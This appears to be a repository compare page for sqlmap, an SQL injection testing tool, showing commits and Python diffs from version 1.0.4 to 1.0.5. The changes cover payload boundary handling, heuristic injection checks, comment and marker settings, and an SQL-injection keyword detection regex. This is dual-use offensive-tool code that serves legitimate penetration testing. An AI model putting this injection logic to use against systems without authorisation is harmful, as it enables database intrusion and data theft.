PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-07 13:11:29 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:1.0.4
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9
...
compare: PenTest:1.0.5
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9

26 Commits
1.0.4 ... 1.0.5

Author SHA1 Message Date
Miroslav Stampar
d7f0b3566d Automatic monthly tagging 2016-05-02 10:06:30 +02:00
Miroslav Stampar
0c67a90cc0 Minor bug fix 2016-05-02 10:06:30 +02:00
Miroslav Stampar
f06e498fb0 Implementation for an Issue #1826 2016-04-29 14:19:32 +02:00
Miroslav Stampar
ad612bf9e4 Patch for Windows banner display 2016-04-29 00:51:20 +02:00
Miroslav Stampar
9dd5cd8eb6 Removing CloudFlare check 2016-04-29 00:17:07 +02:00
Miroslav Stampar
5ed3cdc819 Minor update 2016-04-22 10:54:55 +02:00
Miroslav Stampar
e07c92bce5 Minor change on banner showing up 2016-04-19 13:45:49 +02:00
Miroslav Stampar
0c5965c7b8 Minor patches 2016-04-19 13:13:37 +02:00
Miroslav Stampar
aa21550712 Minor patch for integer casting heuristics (circumvent auto-casting by DBMS itself) 2016-04-15 13:47:19 +02:00
Miroslav Stampar
66061e8c5f Fixes #1811 2016-04-15 12:04:54 +02:00
Miroslav Stampar
c4b74c2e01 Fixes #1810 2016-04-12 22:37:14 +02:00
Miroslav Stampar
55b23e78ee Fixes #1809 2016-04-12 22:10:26 +02:00
Miroslav Stampar
a9526bda92 Minor patch 2016-04-11 22:38:44 +02:00
Miroslav Stampar
0901da3f83 Update for an Issue #1807 2016-04-11 09:43:50 +02:00
Miroslav Stampar
8004652f7b Some more optimization 2016-04-08 15:30:25 +02:00
Miroslav Stampar
c9b410c97f Minor update 2016-04-08 14:59:52 +02:00
Miroslav Stampar
814d710320 Minor speed up 2016-04-08 14:41:34 +02:00
Miroslav Stampar
38fcc5a35a Update for pre-WHERE payloads 2016-04-08 13:19:42 +02:00
Miroslav Stampar
674d516f3e Minor patch 2016-04-08 11:40:09 +02:00
Miroslav Stampar
8ceb4907a5 Another update for Issue #1800 2016-04-08 11:37:38 +02:00
Miroslav Stampar
ce3749622a Minor revisit of payload boundaries (Issue #1800) 2016-04-08 11:28:17 +02:00
Miroslav Stampar
bcfae99701 Adding new WAF script 2016-04-08 10:32:18 +02:00
Miroslav Stampar
44c1c2c6f0 Minor update (reported via email) 2016-04-06 11:43:53 +02:00
Miroslav Stampar
ac08db82b2 Including one more error regex (based on testasp[.]vulnweb[.]com) 2016-04-04 16:14:30 +02:00
Miroslav Stampar
305bfd9d30 Implements #1763 2016-04-04 13:50:10 +02:00
Miroslav Stampar
f9aaec7b4a Minor patch (binary extensions) 2016-04-04 12:43:53 +02:00
34 changed files with 358 additions and 291 deletions
Expand all files Collapse all files

8
lib/controller/checks.py
View File

@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
import copy import copy
import httplib import httplib
import random
import re import re
import socket import socket
import time import time
@@ -62,7 +63,6 @@ from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CLOUDFLARE_SERVER_HEADER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
from lib.core.settings import FORMAT_EXCEPTION_STRINGS from lib.core.settings import FORMAT_EXCEPTION_STRINGS
@@ -906,7 +906,7 @@ def heuristicCheckSqlInjection(place, parameter):
if not result: if not result:
randStr = randomStr() randStr = randomStr()
payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix) payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE) payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
casting = Request.queryPage(payload, place, raise404=False) casting = Request.queryPage(payload, place, raise404=False)
@@ -1383,10 +1383,6 @@ def checkConnection(suppressOutput=False):
else: else:
kb.errorIsNone = True kb.errorIsNone = True
if headers and headers.get("Server", "") == CLOUDFLARE_SERVER_HEADER:
warnMsg = "CloudFlare response detected"
logger.warn(warnMsg)
except SqlmapConnectionException, ex: except SqlmapConnectionException, ex:
if conf.ipv6: if conf.ipv6:
warnMsg = "check connection to a provided " warnMsg = "check connection to a provided "

2
lib/controller/controller.py
View File

@@ -521,7 +521,7 @@ def start():
injection = checkSqlInjection(place, parameter, value) injection = checkSqlInjection(place, parameter, value)
proceed = not kb.endDetection proceed = not kb.endDetection
if injection is not None and injection.place is not None: if getattr(injection, "place", None) is not None:
kb.injections.append(injection) kb.injections.append(injection)
# In case when user wants to end detection phase (Ctrl+C) # In case when user wants to end detection phase (Ctrl+C)

19
lib/core/agent.py
View File

@@ -35,10 +35,12 @@ from lib.core.enums import PLACE
from lib.core.enums import POST_HINT from lib.core.enums import POST_HINT
from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import NULL
from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import REPLACEMENT_MARKER from lib.core.settings import REPLACEMENT_MARKER
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
@@ -95,9 +97,12 @@ class Agent(object):
paramDict = conf.paramDict[place] paramDict = conf.paramDict[place]
origValue = getUnicode(paramDict[parameter]) origValue = getUnicode(paramDict[parameter])
if place == PLACE.URI: if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
paramString = origValue paramString = origValue
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0] if place == PLACE.URI:
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
else:
origValue = re.search(r"\w+\Z", origValue.split(BOUNDED_INJECTION_MARKER)[0]).group(0)
origValue = origValue[origValue.rfind('/') + 1:] origValue = origValue[origValue.rfind('/') + 1:]
for char in ('?', '=', ':'): for char in ('?', '=', ':'):
if char in origValue: if char in origValue:
@@ -161,6 +166,9 @@ class Agent(object):
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER) newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue)) retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR) retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
retVal = "%s=%s" % (parameter, paramString.replace(_, self.addPayloadDelimiters(newValue)))
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST): elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue)) retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
else: else:
@@ -273,7 +281,7 @@ class Agent(object):
where = kb.injection.data[kb.technique].where if where is None else where where = kb.injection.data[kb.technique].where if where is None else where
comment = kb.injection.data[kb.technique].comment if comment is None else comment comment = kb.injection.data[kb.technique].comment if comment is None else comment
if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT: if Backend.getIdentifiedDbms() == DBMS.ACCESS and "--" in (comment or ""):
comment = queries[DBMS.ACCESS].comment.query comment = queries[DBMS.ACCESS].comment.query
if comment is not None: if comment is not None:
@@ -296,7 +304,7 @@ class Agent(object):
_ = ( _ = (
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
("[HASH_REPLACE]", kb.chars.hash_), ("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
) )
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
@@ -747,6 +755,9 @@ class Agent(object):
intoRegExp = intoRegExp.group(1) intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)] query = query[:query.index(intoRegExp)]
position = 0
char = NULL
for element in xrange(0, count): for element in xrange(0, count):
if element > 0: if element > 0:
unionQuery += ',' unionQuery += ','

55
lib/core/common.py
View File

@@ -91,6 +91,7 @@ from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict from lib.core.optiondict import optDict
from lib.core.settings import BANNER from lib.core.settings import BANNER
from lib.core.settings import BOLD_PATTERNS from lib.core.settings import BOLD_PATTERNS
from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
@@ -151,6 +152,7 @@ from lib.core.threads import getCurrentThreadData
from lib.utils.sqlalchemy import _sqlalchemy from lib.utils.sqlalchemy import _sqlalchemy
from thirdparty.clientform.clientform import ParseResponse from thirdparty.clientform.clientform import ParseResponse
from thirdparty.clientform.clientform import ParseError from thirdparty.clientform.clientform import ParseError
from thirdparty.colorama.initialise import init as coloramainit
from thirdparty.magic import magic from thirdparty.magic import magic
from thirdparty.odict.odict import OrderedDict from thirdparty.odict.odict import OrderedDict
from thirdparty.termcolor.termcolor import colored from thirdparty.termcolor.termcolor import colored
@@ -598,6 +600,17 @@ def paramToDict(place, parameters=None):
warnMsg += "so sqlmap could be able to run properly" warnMsg += "so sqlmap could be able to run properly"
logger.warn(warnMsg) logger.warn(warnMsg)
if place in (PLACE.POST, PLACE.GET):
regex = r"\A([^\w]+.*\w+)([^\w]+)\Z"
match = re.search(regex, testableParameters[parameter])
if match:
_ = re.sub(regex, "\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, testableParameters[parameter])
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % _
test = readInput(message, default="N")
if test[0] in ("y", "Y"):
testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])
if conf.testParameter and not testableParameters: if conf.testParameter and not testableParameters:
paramStr = ", ".join(test for test in conf.testParameter) paramStr = ", ".join(test for test in conf.testParameter)
@@ -968,7 +981,12 @@ def randomRange(start=0, stop=1000, seed=None):
423 423
""" """
randint = random.WichmannHill(seed).randint if seed is not None else random.randint if seed is not None:
_ = getCurrentThreadData().random
_.seed(seed)
randint = _.randint
else:
randint = random.randint
return int(randint(start, stop)) return int(randint(start, stop))
@@ -981,7 +999,12 @@ def randomInt(length=4, seed=None):
874254 874254
""" """
choice = random.WichmannHill(seed).choice if seed is not None else random.choice if seed is not None:
_ = getCurrentThreadData().random
_.seed(seed)
choice = _.choice
else:
choice = random.choice
return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length))) return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
@@ -994,7 +1017,12 @@ def randomStr(length=4, lowercase=False, alphabet=None, seed=None):
'RNvnAv' 'RNvnAv'
""" """
choice = random.WichmannHill(seed).choice if seed is not None else random.choice if seed is not None:
_ = getCurrentThreadData().random
_.seed(seed)
choice = _.choice
else:
choice = random.choice
if alphabet: if alphabet:
retVal = "".join(choice(alphabet) for _ in xrange(0, length)) retVal = "".join(choice(alphabet) for _ in xrange(0, length))
@@ -1053,10 +1081,15 @@ def banner():
This function prints sqlmap banner with its version This function prints sqlmap banner with its version
""" """
_ = BANNER if not any(_ in sys.argv for _ in ("--version", "--pickled-options")):
if not getattr(LOGGER_HANDLER, "is_tty", False): _ = BANNER
_ = re.sub("\033.+?m", "", _)
dataToStdout(_, forceOutput=True) if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv:
_ = re.sub("\033.+?m", "", _)
elif IS_WIN:
coloramainit()
dataToStdout(_, forceOutput=True)
def parsePasswordHash(password): def parsePasswordHash(password):
""" """
@@ -3147,14 +3180,6 @@ def intersect(valueA, valueB, lowerCase=False):
return retVal return retVal
def cpuThrottle(value):
"""
Does a CPU throttling for lesser CPU consumption
"""
delay = 0.00001 * (value ** 2)
time.sleep(delay)
def removeReflectiveValues(content, payload, suppressWarning=False): def removeReflectiveValues(content, payload, suppressWarning=False):
""" """
Neutralizes reflective values in a given content based on a payload Neutralizes reflective values in a given content based on a payload

1
lib/core/convert.py
View File

@@ -11,7 +11,6 @@ import pickle
import re import re
import StringIO import StringIO
import sys import sys
import types
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING

1
lib/core/defaults.py
View File

@@ -11,7 +11,6 @@ _defaults = {
"csvDel": ",", "csvDel": ",",
"timeSec": 5, "timeSec": 5,
"googlePage": 1, "googlePage": 1,
"cpuThrottle": 5,
"verbose": 1, "verbose": 1,
"delay": 0, "delay": 0,
"timeout": 30, "timeout": 30,

8
lib/core/option.py
View File

@@ -151,7 +151,6 @@ from lib.utils.crawler import crawl
from lib.utils.deps import checkDependencies from lib.utils.deps import checkDependencies
from lib.utils.search import search from lib.utils.search import search
from lib.utils.purge import purge from lib.utils.purge import purge
from thirdparty.colorama.initialise import init as coloramainit
from thirdparty.keepalive import keepalive from thirdparty.keepalive import keepalive
from thirdparty.oset.pyoset import oset from thirdparty.oset.pyoset import oset
from thirdparty.socks import socks from thirdparty.socks import socks
@@ -2331,10 +2330,6 @@ def _basicOptionValidation():
errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option" errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
raise SqlmapSyntaxException(errMsg) raise SqlmapSyntaxException(errMsg)
if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0):
errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]"
raise SqlmapSyntaxException(errMsg)
if conf.textOnly and conf.nullConnection: if conf.textOnly and conf.nullConnection:
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg) raise SqlmapSyntaxException(errMsg)
@@ -2536,9 +2531,6 @@ def _resolveCrossReferences():
lib.controller.checks.setVerbosity = setVerbosity lib.controller.checks.setVerbosity = setVerbosity
def initOptions(inputOptions=AttribDict(), overrideOptions=False): def initOptions(inputOptions=AttribDict(), overrideOptions=False):
if IS_WIN:
coloramainit()
_setConfAttributes() _setConfAttributes()
_setKnowledgeBaseAttributes() _setKnowledgeBaseAttributes()
_mergeOptions(inputOptions, overrideOptions) _mergeOptions(inputOptions, overrideOptions)

1
lib/core/optiondict.py
View File

@@ -230,7 +230,6 @@ optDict = {
"disablePrecon": "boolean", "disablePrecon": "boolean",
"binaryFields": "string", "binaryFields": "string",
"profile": "boolean", "profile": "boolean",
"cpuThrottle": "integer",
"forceDns": "boolean", "forceDns": "boolean",
"identifyWaf": "boolean", "identifyWaf": "boolean",
"skipWaf": "boolean", "skipWaf": "boolean",

13
lib/core/settings.py
View File

@@ -10,7 +10,6 @@ import re
import subprocess import subprocess
import string import string
import sys import sys
import time
import types import types
from lib.core.datatype import AttribDict from lib.core.datatype import AttribDict
@@ -20,7 +19,7 @@ from lib.core.enums import OS
from lib.core.revision import getRevisionNumber from lib.core.revision import getRevisionNumber
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.0.4.0" VERSION = "1.0.5.0"
REVISION = getRevisionNumber() REVISION = getRevisionNumber()
STABLE = VERSION.count('.') <= 2 STABLE = VERSION.count('.') <= 2
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev") VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
@@ -61,6 +60,7 @@ PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
URI_QUESTION_MARKER = "__QUESTION_MARK__" URI_QUESTION_MARKER = "__QUESTION_MARK__"
ASTERISK_MARKER = "__ASTERISK_MARK__" ASTERISK_MARKER = "__ASTERISK_MARK__"
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__" REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
RANDOM_INTEGER_MARKER = "[RANDINT]" RANDOM_INTEGER_MARKER = "[RANDINT]"
RANDOM_STRING_MARKER = "[RANDSTR]" RANDOM_STRING_MARKER = "[RANDSTR]"
@@ -313,9 +313,6 @@ BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
# Regex used for parsing XML Burp saved history items # Regex used for parsing XML Burp saved history items
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)' BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
# Server header in CloudFlare responses
CLOUDFLARE_SERVER_HEADER = "cloudflare-nginx"
# Encoding used for Unicode data # Encoding used for Unicode data
UNICODE_ENCODING = "utf8" UNICODE_ENCODING = "utf8"
@@ -448,7 +445,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b" DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
# Extensions skipped by crawler # Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx") CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
# Patterns often seen in HTTP headers containing custom injection marking character # Patterns often seen in HTTP headers containing custom injection marking character
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)" PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
@@ -533,7 +530,7 @@ HASHDB_FLUSH_RETRIES = 3
HASHDB_END_TRANSACTION_RETRIES = 3 HASHDB_END_TRANSACTION_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism) # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10)) HASHDB_MILESTONE_VALUE = "WVMqopmuzX" # "".join(random.sample(string.ascii_letters, 10))
# Warn user of possible delay due to large page dump in full UNION query injections # Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2 LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -578,7 +575,7 @@ MAX_BISECTION_LENGTH = 50 * 1024 * 1024
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__" LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
# Generic SQL comment formation # Generic SQL comment formation
GENERIC_SQL_COMMENT = "-- -" GENERIC_SQL_COMMENT = "-- [RANDSTR]"
# Threshold value for turning back on time auto-adjustment mechanism # Threshold value for turning back on time auto-adjustment mechanism
